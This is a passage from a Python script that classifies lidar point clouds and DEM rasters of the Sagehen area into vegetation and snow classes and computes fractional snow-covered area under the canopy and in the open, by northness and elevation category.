y0]\n \n return extent\n\ndef creatingCentroidGroundpointsFromDem(tiffFilename,elevationMissNo):#,pathNameforDemImage):\n demset = gdal.Open(tiffFilename)\n band = demset.GetRasterBand(1)\n elevation = band.ReadAsArray()\n elevation[elevation == -9999.] = elevationMissNo\n elevation[elevation > 10000.] 
= elevationMissNo\n\n x0, dx, dxdy, y0, dydx, dy = demset.GetGeoTransform()\n nrows, ncols = elevation.shape\n \n latitude =[]\n for x in range (ncols):\n latitude.append(x+x0)\n longitude = []\n for y in range (nrows):\n longitude.append(y0-y)\n \n latitude_rp = np.tile(latitude, nrows)\n longitude_rp = np.repeat(longitude, ncols)\n elevation_rp = np.reshape(elevation,(nrows*ncols)).T\n dem_groundPoints = np.vstack([latitude_rp,longitude_rp,elevation_rp]).T\n \n dem_groundPoints_df0 = pd.DataFrame(dem_groundPoints,columns=['x','y','z'])\n dem_groundPoints_df = pd.concat([dem_groundPoints_df0[['x','y']].astype(int),dem_groundPoints_df0['z']], axis=1)\n dem_groundPoints_df.sort_values(by=['x','y'],inplace=True)\n dem_groundPoints_df.index=np.arange(0,len(dem_groundPoints_df))\n \n return dem_groundPoints,dem_groundPoints_df\n\ndef creatingLatituteLongitudeFromDem(tiffFilename,elevationMissNo):#,pathNameforDemImage):\n demset = gdal.Open(tiffFilename)\n band = demset.GetRasterBand(1)\n elevation = band.ReadAsArray()\n elevation[elevation == -9999.] = elevationMissNo\n elevation[elevation > 10000.] = elevationMissNo\n\n x0, dx, dxdy, y0, dydx, dy = demset.GetGeoTransform()\n nrows, ncols = elevation.shape\n \n latitude =[]\n for x in range (ncols):\n latitude.append(x+x0)\n longitude = []\n for y in range (nrows):\n longitude.append(y0-y)\n \n latitude_rp = np.tile(latitude, nrows)\n longitude_rp = np.repeat(longitude, ncols)\n \n return latitude_rp, longitude_rp, nrows, ncols\n\ndef cutPart0fMapSort(points_df,minX,maxX,minY,maxY):\n points_df_int = points_df[(points_df['x'] >= minX) & (points_df['x'] <= maxX)]\n points_df_int_sp0 = points_df_int[(points_df_int['y'] >= minY) & (points_df_int['y'] <= maxY)]\n #points_df_int_sp = points_df_int_sp0.values\n points_df_sp_intg = pd.concat([points_df_int_sp0[['x','y']].astype(int),points_df_int_sp0['z']], axis=1)\n points_df_sp_intg.sort_values(by=['x','y'],inplace=True)\n points_df_sp_intg.index=np.arange(0,len(points_df_sp_intg))\n \n return points_df_sp_intg\n\ndef cutPart0fMap(arry,minX,maxX,minY,maxY):\n arry_df = pd.DataFrame(arry)\n points_df_int = arry_df[(arry_df[0] >= minX) & (arry_df[0] <= maxX)]\n points_df_int_sp0 = points_df_int[(points_df_int[1] >= minY) & (points_df_int[1] <= maxY)]\n points_df_sp_intg = pd.concat([points_df_int_sp0], axis=1)\n points_df_sp_intg.index=np.arange(0,len(points_df_sp_intg))\n \n return points_df_sp_intg\n\ndef readLasFile (lasFilePath):\n infile = ls.file.File(lasFilePath, mode=\"r\")\n coords = np.vstack((infile.x, infile.y, infile.z)).T\n coords_df0 = pd.DataFrame(coords,columns=['x','y','z'])\n coords_df = pd.concat([coords_df0[['x','y']].astype(int),coords_df0['z']], axis=1)\n coords_df.sort_values(by=['x','y'],inplace=True)\n coords_df.index=np.arange(0,len(coords_df)) \n \n return coords_df\n\ndef calculatingUpGroundPoints (coords_df,dem_groundPoints_df,ncols):\n print(\"please wait ...\")\n coords_bnry = np.vstack([coords_df['x']-np.min(coords_df['x']),coords_df['y']-np.min(coords_df['y']),coords_df['z']]).T\n coords_bnry_df = pd.DataFrame(coords_bnry,columns=['x','y','z'])\n N=len(coords_bnry_df)\n M=len(dem_groundPoints_df)\n print(\"total length: %s\" %N)\n upGroundPoints = [0]*N\n nn=0\n min_x=np.min(coords_df['x'])\n min_y=np.min(coords_df['y'])\n z=dem_groundPoints_df['z']\n for row in coords_bnry_df.itertuples():\n if nn%100000==0:\n print (\"processed %s\" %nn)\n \n indx = row.y + row.x*(ncols)\n \n if indx<M:\n upG = row.z-z[indx] # dem_groundPoints_df['z'][indx]\n else:\n upG = 
row.z-z[M-1]\n        \n        upGroundPoints[nn]=[row.x+min_x,row.y+min_y,upG]\n        nn+=1\n    return upGroundPoints\n\ndef createClassIndexBasedDF(pointFile,ncol):\n    pointFile_df0 = pd.DataFrame(pointFile,columns=['x','y','z'])\n    pointFile_df = pd.concat([pointFile_df0[['x','y']].astype(int),pointFile_df0['z']], axis=1)\n    minX = np.min(pointFile_df['x'])\n    minY = np.min(pointFile_df['y'])\n    pointFile_indx_DF = np.vstack([pointFile_df['x']-minX,pointFile_df['y']-minY,pointFile_df['z']]).T\n    pointFile_indx = pointFile_indx_DF[:,1]+ncol*pointFile_indx_DF[:,0]\n    pointFile_df.index = pointFile_indx.astype(int)\n    return pointFile_indx, pointFile_df\n    \ndef defineSpecificClassGreater(classesG, specific0bjectHeightG):\n    specificClassG = []\n    for row in classesG.itertuples():\n        if row.z>specific0bjectHeightG:\n            specificClassG.append(row)\n    return specificClassG\n\ndef defineSpecificClassLess (classesL, specific0bjectHeightL):\n    specificClassL = []\n    for row in classesL.itertuples():\n        if row.z<specific0bjectHeightL:\n            specificClassL.append(row)\n    return specificClassL\n\ndef defineLowVegClass2(classes):\n    lowVegClass = []\n    for row in classes.itertuples():\n        if row.z<=2 and row.z>=0.15:\n            lowVegClass.append(row)\n    return lowVegClass\n\ndef differenceBetwee2classes (primaryClass,secondNumClass): #to define nolowVegClass and openClass\n    primaryNumClass = list(np.arange(len(primaryClass)))\n    cleanNumClass = list(set(primaryNumClass)-set(secondNumClass))\n    cleanClass = []\n    for indx in cleanNumClass:\n        cleanClass.append(primaryClass[indx])\n    return cleanClass, cleanNumClass\n\ndef calculatingSlopeAspectNorthness(demFilename,slopeFileName,aspectFileName,elevation,nrows,ncols,lat,Long):\n    gdal.DEMProcessing(slopeFileName, demFilename, 'slope')\n    with rasterio.open(slopeFileName) as datasets1:\n        slope=datasets1.read(1) #slope in degree\n    slope_rad = slope * 0.0174533 #slope in radian\n    slope_sin = np.sin(slope_rad)\n\n    gdal.DEMProcessing(aspectFileName, demFilename, 'aspect')\n    with rasterio.open(aspectFileName) as dataseta:\n        aspect=dataseta.read(1)\n    aspect_rad = aspect * 0.0174533\n    aspect_cos = np.cos(aspect_rad)\n\n    northness=aspect_cos*slope_sin\n    northness_col = np.reshape(northness,(nrows*ncols)).T\n    elevation_col = np.reshape(elevation,(nrows*ncols)).T\n    slope_col = np.reshape(slope,(nrows*ncols)).T\n    elevNrth_gp = np.vstack([lat,Long,northness_col,elevation_col]).T\n    index_ls = np.vstack([lat,Long,northness_col,elevation_col,slope_col,elevation_col]).T\n#    index_ls_no30 = index_ls[index_ls[:,4]<30]\n    return elevNrth_gp, index_ls\n\n#classification with northness and elevation index\ndef classificationNorthnessElev(index_ls,nrth1,nrth2,elev1,elev2,ncol,minX,minY):#0.25\n    index_ls[:,4][(index_ls[:,2]<nrth1)&(index_ls[:,3]<elev1)]=11\n    index_ls[:,4][(index_ls[:,2]>nrth2)&(index_ls[:,3]<elev1)]=31\n    index_ls[:,4][(index_ls[:,2]<=nrth2)&(index_ls[:,2]>=nrth1)&(index_ls[:,3]<elev1)]=21\n    index_ls[:,4][(index_ls[:,2]<nrth1)&(index_ls[:,3]>elev2)]=13\n    index_ls[:,4][(index_ls[:,2]>nrth2)&(index_ls[:,3]>elev2)]=33\n    index_ls[:,4][(index_ls[:,2]<=nrth2)&(index_ls[:,2]>=nrth1)&(index_ls[:,3]>elev2)]=23\n    index_ls[:,4][(index_ls[:,2]<nrth1)&(index_ls[:,3]>=elev1)&(index_ls[:,3]<=elev2)]=12\n    index_ls[:,4][(index_ls[:,2]>nrth2)&(index_ls[:,3]>=elev1)&(index_ls[:,3]<=elev2)]=32\n    index_ls[:,4][(index_ls[:,2]<=nrth2)&(index_ls[:,2]>=nrth1)&(index_ls[:,3]>=elev1)&(index_ls[:,3]<=elev2)]=22\n\n    pointFile_df = pd.DataFrame(index_ls,columns=['x','y','z','idx','Index','extra'])\n    indx_DF = 
np.vstack([pointFile_df['x']-minX,pointFile_df['y']-minY]).T\n    pointFile_indx = (indx_DF[:,1]+ncol*indx_DF[:,0]).astype(int)\n    index_ls[:,5] = pointFile_indx\n    \n    exposed_lowElev = index_ls[index_ls[:,4]==11]\n    exposed_lowElev_df = pd.DataFrame(exposed_lowElev,columns = ['x','y','n','e','idx','Index'])\n    nuetral_lowElev = index_ls[index_ls[:,4]==21]\n    nuetral_lowElev_df = pd.DataFrame(nuetral_lowElev,columns = ['x','y','n','e','idx','Index'])\n    sheltered_lowElev = index_ls[index_ls[:,4]==31]\n    sheltered_lowElev_df = pd.DataFrame(sheltered_lowElev,columns = ['x','y','n','e','idx','Index'])\n    exposed_midElev = index_ls[index_ls[:,4]==12]\n    exposed_midElev_df = pd.DataFrame(exposed_midElev,columns = ['x','y','n','e','idx','Index'])\n    nuetral_midElev = index_ls[index_ls[:,4]==22]\n    nuetral_midElev_df = pd.DataFrame(nuetral_midElev,columns = ['x','y','n','e','idx','Index'])\n    sheltered_midElev = index_ls[index_ls[:,4]==32]\n    sheltered_midElev_df = pd.DataFrame(sheltered_midElev,columns = ['x','y','n','e','idx','Index'])\n    exposed_hiElev = index_ls[index_ls[:,4]==13]\n    exposed_hiElev_df = pd.DataFrame(exposed_hiElev,columns = ['x','y','n','e','idx','Index'])\n    nuetral_hiElev = index_ls[index_ls[:,4]==23]\n    nuetral_hiElev_df = pd.DataFrame(nuetral_hiElev,columns = ['x','y','n','e','idx','Index'])\n    sheltered_hiElev = index_ls[index_ls[:,4]==33]\n    sheltered_hiElev_df = pd.DataFrame(sheltered_hiElev,columns = ['x','y','n','e','idx','Index'])\n    \n    topo_dimension = {'sl':sheltered_lowElev_df,'nl':nuetral_lowElev_df,'el':exposed_lowElev_df,\n                      'sm':sheltered_midElev_df,'nm':nuetral_midElev_df,'em':exposed_midElev_df,\n                      'sh':sheltered_hiElev_df,'nh':nuetral_hiElev_df,'eh':exposed_hiElev_df}\n    return topo_dimension\n\n#%% dem snow off (veg) for vcm\n#if test_flag is False: \nfilenameS0fvcm = \"G:/hhs_DST/lidar_analysis/sagehen/dem2014snow0ff.tif\"\nelevationVegvcm = readPlotDEM(filenameS0fvcm,elevationMissNoS0f)#,pathNameS0fvcm\n\ndem_groundPointsVegVcm, dem_groundPointsVegVcm_df = creatingCentroidGroundpointsFromDem(filenameS0fvcm,elevationMissNoS0f)#,pathNameS)\nlat_vcm, long_vcm, nrows_vcm, ncols_vcm = creatingLatituteLongitudeFromDem(filenameS0fvcm,elevationMissNoS0f)\n\n#calculating slope, aspect, northness\nelevNrth_gp_vcm, index_vcm = calculatingSlopeAspectNorthness(filenameS0fvcm,\n                                                             'G:/hhs_DST/lidar_analysis/sagehen/slopeSc.tif',\n                                                             'G:/hhs_DST/lidar_analysis/sagehen/aspectSc.tif',\n                                                             elevationVegvcm,nrows_vcm,ncols_vcm,lat_vcm,long_vcm)\nindex_vcm[:,4][(index_vcm[:,4]==-9999.)]=31\nindex_noG30 = index_vcm[(index_vcm[:,4]<30.)] #slope less than 30\n\n#index_elevG2170 = index_noG30[(index_noG30[:,3]>2170.)] #slope less than 30\n#filename_slope = \"G:/hhs_DST/lidar_analysis/sagehen/slopeSc.tif\"\n#slope_degree = readPlotDEM(filename_slope,0)\n\n#las file snow off (veg) for vcm\nlasFilePath_vegVcm1 = \"G:/hhs_DST/lidar_analysis/sagehen/points1.las\"\ncoordsVegVcm_df1 = readLasFile (lasFilePath_vegVcm1)\nlasFilePath_vegVcm2 = \"G:/hhs_DST/lidar_analysis/sagehen/points2.las\"\ncoordsVegVcm_df2 = readLasFile (lasFilePath_vegVcm2)\nlasFilePath_vegVcm3 = \"G:/hhs_DST/lidar_analysis/sagehen/points3.las\"\ncoordsVegVcm_df3 = readLasFile (lasFilePath_vegVcm3)\nlasFilePath_vegVcm4 = \"G:/hhs_DST/lidar_analysis/sagehen/points4.las\"\ncoordsVegVcm_df4 = readLasFile (lasFilePath_vegVcm4)\ncoordsVegVcm_df = pd.concat([coordsVegVcm_df4,coordsVegVcm_df2,coordsVegVcm_df1,coordsVegVcm_df3])\n\n#las file snow on (snw) for vcm\n#from LiDar_DemBasedClassification_scSnow0n import coordsnow0nSc18Y\nfrom 
LiDar_DemBasedClassification_scSnow0n import coordsnow0nSc17A\n#from LiDar_DemBasedClassification_scSnow0n import coordsnow0nSc26M\n\ncoordsSnwVcm_df = coordsnow0nSc17A.copy()\ncoordsSnwVcm_df['z'] = coordsSnwVcm_df['z']-0.26\n\n#cutting some part of dem map\nminXVcm = np.max([np.min(dem_groundPointsVegVcm_df['x']),np.min(coordsSnwVcm_df['x']),np.min(coordsVegVcm_df['x'])]) \nmaxXVcm = np.min([np.max(dem_groundPointsVegVcm_df['x']),np.max(coordsSnwVcm_df['x']),np.max(coordsVegVcm_df['x'])])#minXVcm+2000\nminYVcm = np.max([np.min(dem_groundPointsVegVcm_df['y']),np.min(coordsSnwVcm_df['y']),np.min(coordsVegVcm_df['y'])])#3971000-1500\nmaxYVcm = np.min([np.max(dem_groundPointsVegVcm_df['y']),np.max(coordsSnwVcm_df['y']),np.max(coordsVegVcm_df['y'])])#minYVcm+2000\n\ndem_groundPointsVegVcm_intg = cutPart0fMapSort(dem_groundPointsVegVcm_df,minXVcm,maxXVcm,minYVcm,maxYVcm).astype(int)\ncoordsVegVcm_intg = cutPart0fMapSort(coordsVegVcm_df,minXVcm,maxXVcm,minYVcm,maxYVcm)\ncoordsSnwVcm_intg = cutPart0fMapSort(coordsSnwVcm_df,minXVcm,maxXVcm,minYVcm,maxYVcm)\nindexVcm_cut = cutPart0fMap(index_noG30,minXVcm,maxXVcm,minYVcm,maxYVcm)\n\nnewNcols = maxYVcm - minYVcm + 1\n#calculating topo_dimension from cut northness\nparams = [-0.10,0.10,2050,2400]\ntopo_dimension_vcm = classificationNorthnessElev(indexVcm_cut.values,params[0],params[1],params[2],params[3],newNcols,minXVcm,minYVcm)\n\n#elevLim = 2650\n#higher_elevLim_index = dem_groundPointsVegVcm_intg[dem_groundPointsVegVcm_intg['z']>elevLim].index\n\n#%% classification with groundpoints from veg dem file :VCM\nupGroundPointsVegVcm = calculatingUpGroundPoints (coordsVegVcm_intg,dem_groundPointsVegVcm_intg,newNcols)\n#classification of snow las file with veg_groundpoints\nupGroundPointsSnwVegVcm = calculatingUpGroundPoints (coordsSnwVcm_intg,dem_groundPointsVegVcm_intg,newNcols)\n\npath2npoutVeg=\"G:/hhs_DST/lidar_analysis/sagehen/upGroundPointsVegSc17A.npy\"\nnp.save(path2npoutVeg,upGroundPointsVegVcm) \nupLoadUpGroundPointsVeg=np.load(path2npoutVeg)\n\npath2npoutSnw=\"G:/hhs_DST/lidar_analysis/sagehen/upGroundPointsSnwSc17A.npy\"\nnp.save(path2npoutSnw,upGroundPointsSnwVegVcm) \nupLoadUpGroundPointsSnw=np.load(path2npoutSnw)\n\n#%% vegetation classification from DEM2010 and las2010 snow off\nvegClassVcm = upGroundPointsVegVcm[:]#upLoadUpGroundPointsVeg.copy()\nvegClassVcm_indx, vegClassVcm_df = createClassIndexBasedDF(vegClassVcm,newNcols)\n\n#all tree classification based on veg dem\nallTreeReturnVcm_df = pd.DataFrame(defineSpecificClassGreater (vegClassVcm_df, 2))\nallTreeReturnVcm_indx = pd.DataFrame((allTreeReturnVcm_df['Index'].astype(int)).drop_duplicates(keep=\"first\", inplace=False))\n\n#finding pixels that have trees\nallTreeClassVcm_df = vegClassVcm_df.loc[allTreeReturnVcm_indx['Index']]\npath3npoutSnw=\"G:/hhs_DST/lidar_analysis/sagehen/allTreeClassSc17A.npy\"\nnp.save(path3npoutSnw,allTreeClassVcm_df) \n \n# trees with low branches\nlowVegTreeClassVcm = pd.DataFrame(defineLowVegClass2(allTreeClassVcm_df))\n\nlowVegTreeClassVcm_indx = pd.DataFrame((lowVegTreeClassVcm['Index'].astype(int)).drop_duplicates(keep=\"first\", inplace=False))\n\n# trees with no low branches (excluding all pixels that have low branches, keeping pixels that have no low branches)\nallTreeClassNoLowVegVcm_indx = (pd.concat([allTreeReturnVcm_indx,lowVegTreeClassVcm_indx])).drop_duplicates(keep=False, inplace=False)\nallTreeClassNoLowVegVcm_df = 
allTreeClassVcm_df.loc[allTreeClassNoLowVegVcm_indx['Index']]\npath4npoutSnw=\"G:/hhs_DST/lidar_analysis/sagehen/allTreeClassNoLowVegSc17A.npy\"\nnp.save(path4npoutSnw,allTreeClassNoLowVegVcm_df) \n\n#testing tree with no low branch class\nallTreeClassNoLowVeg_test1 = allTreeClassNoLowVegVcm_df[((allTreeClassNoLowVegVcm_df['z']<0.15))]\nallTreeClassNoLowVeg_test1_pixle = allTreeClassNoLowVeg_test1[['x','y']].drop_duplicates(keep='first', inplace=False)\nallTreeClassNoLowVeg_pixle_indx = np.vstack([allTreeClassNoLowVeg_test1_pixle['x']-minXVcm,allTreeClassNoLowVeg_test1_pixle['y']-minYVcm]).T\npointFile_indx1 = allTreeClassNoLowVeg_pixle_indx[:,1]+newNcols*allTreeClassNoLowVeg_pixle_indx[:,0]\n\nallTreeClassNoLowVeg_test2 = allTreeClassNoLowVegVcm_df[((allTreeClassNoLowVegVcm_df['z']>2))]\nallTreeClassNoLowVeg_test2_pixle = allTreeClassNoLowVeg_test2[['x','y']].drop_duplicates(keep='first', inplace=False)\nallTreeClassNoLowVeg_pixle_indx2 = np.vstack([allTreeClassNoLowVeg_test2_pixle['x']-minXVcm,allTreeClassNoLowVeg_test2_pixle['y']-minYVcm]).T\npointFile_indx2 = allTreeClassNoLowVeg_pixle_indx2[:,1]+newNcols*allTreeClassNoLowVeg_pixle_indx2[:,0]\n\nset(pointFile_indx1) < set(pointFile_indx2)\n\n#all 0pen classification based on veg dem\nall0penClassVcm = (pd.concat([vegClassVcm_df,allTreeClassVcm_df])).drop_duplicates(keep=False, inplace=False)\nall0penClassVcm_indx = ((pd.DataFrame(all0penClassVcm.index)).astype(int)).drop_duplicates(keep='first', inplace=False)\n# 0pen with low branches\nlowVeg0penClassVcm = pd.DataFrame(defineLowVegClass2(all0penClassVcm))\nlowVeg0penClassVcm.index = lowVeg0penClassVcm['Index']\n\n# 0pen with no grass (excluding all pixels that have low branches from open)\nall0penClassNoGrass_indx = (pd.concat([lowVeg0penClassVcm['Index'],all0penClassVcm_indx[0]])).drop_duplicates(keep=False, inplace=False)\nall0penClassNoGrass_df = all0penClassVcm.loc[all0penClassNoGrass_indx]\npath5npoutSnw=\"G:/hhs_DST/lidar_analysis/sagehen/all0penClassNoGrassSc17A.npy\"\nnp.save(path5npoutSnw,all0penClassNoGrass_df) \n\nall0penClassNoGrass_df_fail = all0penClassNoGrass_df[(all0penClassNoGrass_df['z']>0.15)]\n#%% snow classification from DEM2010 (snow off) and las2010 snow on \nsnowClassVcm = upGroundPointsSnwVegVcm[:] #upLoadUpGroundPointsSnw.copy()\nsnowClassVcm_indx, snowClassVcm_df = createClassIndexBasedDF(snowClassVcm,newNcols)\n\n# tree snow pixels that do not have a low branch\nallSnowNoLowVegClassVcm_df = (snowClassVcm_df.loc[allTreeClassNoLowVegVcm_indx['Index'].values]).dropna()\npath6npoutSnw=\"G:/hhs_DST/lidar_analysis/sagehen/allSnowNoLowVegClassSc17A.npy\"\nnp.save(path6npoutSnw,allSnowNoLowVegClassVcm_df)\n\n# snow under canopy\n#groupby_mean = allSnowNoLowVegClassVcm_df.groupby(['x','y']).mean()\n\nallSnowUnderTreeClassVcm_df0 = pd.DataFrame(defineSpecificClassLess (allSnowNoLowVegClassVcm_df, 2))\nallSnowUnderTreeClassVcm_df0.index = allSnowUnderTreeClassVcm_df0['Index']\nallSnowUnderTreeClassVcm_df = pd.DataFrame(defineSpecificClassGreater (allSnowUnderTreeClassVcm_df0[['x','y','z']], 0.15))\nallSnowUnderTreeClassVcm_df.index = allSnowUnderTreeClassVcm_df['Index']\npath7npoutSnw=\"G:/hhs_DST/lidar_analysis/sagehen/allsnowUnderTreeClassSc17A.npy\"\nnp.save(path7npoutSnw,allSnowUnderTreeClassVcm_df)\n\nallNoSnowUnderTreeClassVcm_df0 = pd.DataFrame(defineSpecificClassLess (allSnowUnderTreeClassVcm_df0[['x','y','z']], 0.15))\nallNoSnowUnderTreeClassVcm_df0.index = allNoSnowUnderTreeClassVcm_df0['Index']\nallNoSnowUnderTreeClassVcm_df = 
pd.DataFrame(defineSpecificClassGreater (allNoSnowUnderTreeClassVcm_df0[['x','y','z']], -0.3))\nallNoSnowUnderTreeClassVcm_df.index = allNoSnowUnderTreeClassVcm_df['Index']\n\n#test snow under the trees (finding duplicates)\nallSnowUnderTreeClassVcm_df_pix = allSnowUnderTreeClassVcm_df[['x','y']].drop_duplicates(keep='first', inplace=False)\nallNoSnowUnderTreeClassVcm_df_pix = allNoSnowUnderTreeClassVcm_df[['x','y']].drop_duplicates(keep='first', inplace=False)\nconcat2DF = pd.concat([allSnowUnderTreeClassVcm_df_pix,allNoSnowUnderTreeClassVcm_df_pix])\nconcat2DF[\"is_duplicate\"]= concat2DF.duplicated()\n#indexing\nSnowUnderTreeDuplicate_indx = (pd.DataFrame(((concat2DF[(concat2DF[\"is_duplicate\"] == True)]).index).values)).drop_duplicates(keep='first', inplace=False)\nallSnowUnderTreeClassVcm_indx = (pd.DataFrame((allSnowUnderTreeClassVcm_df.index).values)).drop_duplicates(keep='first', inplace=False)\nallNoSnowUnderTreeClassVcm_indx = (pd.DataFrame(allNoSnowUnderTreeClassVcm_df.index.values)).drop_duplicates(keep='first', inplace=False)\n\n#final snow under the tree and no snow under tree pixels\nSnowUnderTreePix_indx = (pd.concat([SnowUnderTreeDuplicate_indx,allSnowUnderTreeClassVcm_indx])).drop_duplicates(keep=False, inplace=False) #no duplicate\nSnowUnderTreeClassVcm_df = allSnowUnderTreeClassVcm_df.copy() #allSnowUnderTreeClassVcm_df.loc[SnowUnderTreePix_indx[0].values] #with duplicate\n\nNoSnowUnderTreePix_indx = (pd.concat([SnowUnderTreeDuplicate_indx,allNoSnowUnderTreeClassVcm_indx])).drop_duplicates(keep=False, inplace=False)\nNoSnowUnderTreeClassVcm_df = allNoSnowUnderTreeClassVcm_df.loc[NoSnowUnderTreePix_indx[0].values]\npath8npoutSnw=\"G:/hhs_DST/lidar_analysis/sagehen/allNoSnowUnderTreeClassSc17A.npy\"\nnp.save(path8npoutSnw,NoSnowUnderTreeClassVcm_df)\n#%% #snow on the ground with no Grass\nallSnow0penGroundClassVcm_df0 = (snowClassVcm_df.loc[all0penClassNoGrass_df.index.drop_duplicates(keep='first')]).dropna()\n#excluding returns with z more than 2m (conflicting pixels)\nallSnow0penGroundClassVcm_df1 = pd.DataFrame(defineSpecificClassLess(allSnow0penGroundClassVcm_df0,5)) \nallSnow0penGroundClassVcm_df1.index = allSnow0penGroundClassVcm_df1['Index']\nallSnow0penGroundClassVcm_df = pd.DataFrame(defineSpecificClassGreater (allSnow0penGroundClassVcm_df1[['x','y','z']], 0.15))\nallSnow0penGroundClassVcm_df.index = allSnow0penGroundClassVcm_df['Index']\npath9npoutSnw=\"G:/hhs_DST/lidar_analysis/sagehen/allSnow0penGroundClassSc17A.npy\"\nnp.save(path9npoutSnw,allSnow0penGroundClassVcm_df)\n\n#no snow on the ground\nallNoSnow0penClassVcm0 = pd.DataFrame(defineSpecificClassLess (allSnow0penGroundClassVcm_df1[['x','y','z']], 0.15))\nallNoSnow0penClassVcm0.index = allNoSnow0penClassVcm0['Index']\nallNoSnow0penClassVcm = pd.DataFrame(defineSpecificClassGreater (allNoSnow0penClassVcm0[['x','y','z']], -0.3))\nallNoSnow0penClassVcm.index = allNoSnow0penClassVcm['Index']\n\n#finding duplicates for snow in 0pen sites\nallSnow0penClassVcm_df_pix = allSnow0penGroundClassVcm_df[['x','y']].drop_duplicates(keep='first', inplace=False)\nallNoSnow0penClassVcm_df_pix = allNoSnow0penClassVcm[['x','y']].drop_duplicates(keep='first', inplace=False)\nconcat2DF2 = pd.concat([allSnow0penClassVcm_df_pix,allNoSnow0penClassVcm_df_pix])\nconcat2DF2[\"is_duplicate\"]= concat2DF2.duplicated()\n#indexing\nSnow0penDuplicate_indx = (pd.DataFrame(((concat2DF2[(concat2DF2[\"is_duplicate\"] == True)]).index).values)).drop_duplicates(keep='first', inplace=False)\nallSnow0penClassVcm_indx = 
(pd.DataFrame((allSnow0penGroundClassVcm_df.index).values)).drop_duplicates(keep='first', inplace=False)\nallNoSnow0penClassVcm_indx = (pd.DataFrame(allNoSnow0penClassVcm.index.values)).drop_duplicates(keep='first', inplace=False)\n\n#final snow in 0pen sites and no snow in 0pen sites\nSnow0penPix_indx = (pd.concat([Snow0penDuplicate_indx,allSnow0penClassVcm_indx])).drop_duplicates(keep=False, inplace=False)\nSnow0penClassVcm_df = allSnow0penGroundClassVcm_df.copy() #allSnow0penGroundClassVcm_df.loc[Snow0penPix_indx[0].values]\n\nNoSnow0penPix_indx = (pd.concat([Snow0penDuplicate_indx,allNoSnow0penClassVcm_indx])).drop_duplicates(keep=False, inplace=False)\nNoSnow0penClassVcm_df = allNoSnow0penClassVcm.loc[NoSnow0penPix_indx[0].values]\npath10npoutSnw=\"G:/hhs_DST/lidar_analysis/sagehen/allNoSnow0penClassSc17A.npy\"\nnp.save(path10npoutSnw,NoSnow0penClassVcm_df)\n\n#%% fSCA no topography\nUT_snowPixels = len(SnowUnderTreeClassVcm_df[['x','y']].drop_duplicates(keep='first'))\nUT_NoSnowPixels = len(NoSnowUnderTreeClassVcm_df[['x','y']].drop_duplicates(keep='first'))\nUT_fSCA = 100.*UT_snowPixels/(UT_snowPixels+UT_NoSnowPixels)\n\nOP_snowPixels = len(Snow0penClassVcm_df[['x','y']].drop_duplicates(keep='first'))\nOP_NoSnowPixels = len(NoSnow0penClassVcm_df[['x','y']].drop_duplicates(keep='first'))\nOP_fSCA = 100.*OP_snowPixels/(OP_NoSnowPixels+OP_snowPixels)\n#%% all classification based on topography and northness for under canopy snow\n# s:sheltered; n:neutral; e:exposed; l:low; m:mid; h:high\n# calculation of fSCA for each of 9 categories, under canopy and in 0pen\nUnTree_el_vcm_df = SnowUnderTreeClassVcm_df.loc[topo_dimension_vcm['el']['Index'].astype(int)].dropna()\nUT_el = len(UnTree_el_vcm_df[['x','y']].drop_duplicates(keep='first'))\nNS_UnTree_el_vcm_df = NoSnowUnderTreeClassVcm_df.loc[topo_dimension_vcm['el']['Index'].astype(int)].dropna()\nNS_UT_el = len(NS_UnTree_el_vcm_df[['x','y']].drop_duplicates(keep='first'))\nFSCA_ut_el = 100.*(float(UT_el)/(UT_el+NS_UT_el))\n\nUnTree_em_vcm_df = SnowUnderTreeClassVcm_df.loc[topo_dimension_vcm['em']['Index'].astype(int)].dropna()\nUT_em = len(UnTree_em_vcm_df[['x','y']].drop_duplicates(keep='first'))\nNS_UnTree_em_vcm_df = NoSnowUnderTreeClassVcm_df.loc[topo_dimension_vcm['em']['Index'].astype(int)].dropna()\nNS_UT_em = len(NS_UnTree_em_vcm_df[['x','y']].drop_duplicates(keep='first'))\nFSCA_ut_em = 100.*(float(UT_em)/(UT_em+NS_UT_em))\n\nUnTree_eh_vcm_df = SnowUnderTreeClassVcm_df.loc[topo_dimension_vcm['eh']['Index'].astype(int)].dropna()\nUT_eh = len(UnTree_eh_vcm_df[['x','y']].drop_duplicates(keep='first'))\nNS_UnTree_eh_vcm_df = NoSnowUnderTreeClassVcm_df.loc[topo_dimension_vcm['eh']['Index'].astype(int)].dropna()\nNS_UT_eh = len(NS_UnTree_eh_vcm_df[['x','y']].drop_duplicates(keep='first'))\nFSCA_ut_eh = 100.*(float(UT_eh)/(UT_eh+NS_UT_eh))\n\nUnTree_nl_vcm_df = SnowUnderTreeClassVcm_df.loc[topo_dimension_vcm['nl']['Index'].astype(int)].dropna()\nUT_nl = len(UnTree_nl_vcm_df[['x','y']].drop_duplicates(keep='first'))\nNS_UnTree_nl_vcm_df = NoSnowUnderTreeClassVcm_df.loc[topo_dimension_vcm['nl']['Index'].astype(int)].dropna()\nNS_UT_nl = len(NS_UnTree_nl_vcm_df[['x','y']].drop_duplicates(keep='first'))\nFSCA_ut_nl = 100.*(float(UT_nl)/(UT_nl+NS_UT_nl))\n\nUnTree_nm_vcm_df = SnowUnderTreeClassVcm_df.loc[topo_dimension_vcm['nm']['Index'].astype(int)].dropna()\nUT_nm = len(UnTree_nm_vcm_df[['x','y']].drop_duplicates(keep='first'))\nNS_UnTree_nm_vcm_df = 
UnTree_nm_vcm_df = SnowUnderTreeClassVcm_df.loc[topo_dimension_vcm['nm']['Index'].astype(int)].dropna()\nUT_nm = len(UnTree_nm_vcm_df[['x','y']].drop_duplicates(keep='first'))\nNS_UnTree_nm_vcm_df = NoSnowUnderTreeClassVcm_df.loc[topo_dimension_vcm['nm']['Index'].astype(int)].dropna()\nNS_UT_nm = len(NS_UnTree_nm_vcm_df[['x','y']].drop_duplicates(keep='first'))\nFSCA_ut_nm = 100.*(float(UT_nm)/(UT_nm+NS_UT_nm))\n\nUnTree_nh_vcm_df = SnowUnderTreeClassVcm_df.loc[topo_dimension_vcm['nh']['Index'].astype(int)].dropna()\nUT_nh = len(UnTree_nh_vcm_df[['x','y']].drop_duplicates(keep='first'))\nNS_UnTree_nh_vcm_df = NoSnowUnderTreeClassVcm_df.loc[topo_dimension_vcm['nh']['Index'].astype(int)].dropna()\nNS_UT_nh = len(NS_UnTree_nh_vcm_df[['x','y']].drop_duplicates(keep='first'))\nFSCA_ut_nh = 100.*(float(UT_nh)/(UT_nh+NS_UT_nh))\n\nUnTree_sl_vcm_df = 